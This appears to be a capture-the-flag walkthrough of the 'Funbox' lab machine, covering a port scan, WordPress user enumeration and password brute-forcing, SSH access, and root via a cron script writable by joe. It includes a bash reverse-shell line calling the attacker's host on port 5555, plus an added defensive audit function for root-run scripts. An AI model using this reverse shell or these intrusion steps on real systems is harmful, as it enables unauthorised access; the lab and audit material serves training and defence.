Target: 192.168.111.140
kali: 192.168.111.111
Port scan
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-title: Did not follow redirect to http://funbox.fritz.box/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
Edit /etc/hosts
┌──(root㉿kali)-[~/funbox]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.111.140 funbox.fritz.box # add this line
It turns out to be a WordPress site.
Use wpscan to enumerate users; two are found, admin and joe. Then brute-force their passwords:
joe:12345
admin:iubire
Log in over SSH as joe with password 12345.
Using pspy64, we see that root periodically runs the script /home/funny/.backup.sh. Write a reverse shell into that script, then listen on port 5555 with nc on kali.
joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
bash -c "bash -i >& /dev/tcp/192.168.111.111/5555 0>&1"
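The root-run script above lives in a user's home directory and can be edited by that user, which is the whole privilege-escalation path. As an added audit helper (not part of the original write-up, and assuming a Linux host with GNU stat), the function below checks a script that root's cron runs and reports whether a non-root user could modify or replace it:

```shell
#!/bin/sh
# Added example: audit whether a script executed by root can be altered by a
# non-root user. Checks the file's owner, its group/other write bits, and the
# owner of its parent directory (a non-root directory owner can replace the
# file even when the file itself is root-owned and 0644).
# Returns 0 when no finding is reported, 1 otherwise.
audit_root_script() {
    f="$1"
    rc=0
    if [ ! -e "$f" ]; then
        echo "MISSING $f (root would run a file that anyone could create)"
        return 1
    fi
    owner=$(stat -c '%U' "$f")   # GNU stat (assumption: Linux)
    mode=$(stat -c '%a' "$f")    # octal permission digits, e.g. 755
    if [ "$owner" != "root" ]; then
        echo "OWNER   $f is owned by $owner, not root"
        rc=1
    fi
    # Write bit (value 2) in the group digit or the other digit
    grp=$(( (mode / 10) % 10 ))
    oth=$(( mode % 10 ))
    if [ $(( grp & 2 )) -ne 0 ] || [ $(( oth & 2 )) -ne 0 ]; then
        echo "WRITE   $f has mode $mode (group/other writable)"
        rc=1
    fi
    d=$(dirname "$f")
    downer=$(stat -c '%U' "$d")
    if [ "$downer" != "root" ]; then
        echo "DIR     $d is owned by $downer, so $f can be replaced"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK      $f"
    return "$rc"
}
```

Run it against every path referenced from /etc/crontab, /etc/cron.d and root's crontab; any OWNER, WRITE or DIR finding is the same misconfiguration that /home/funny/.backup.sh has here.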
Get the flag
root@funbox:~# cat flag.txt
cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2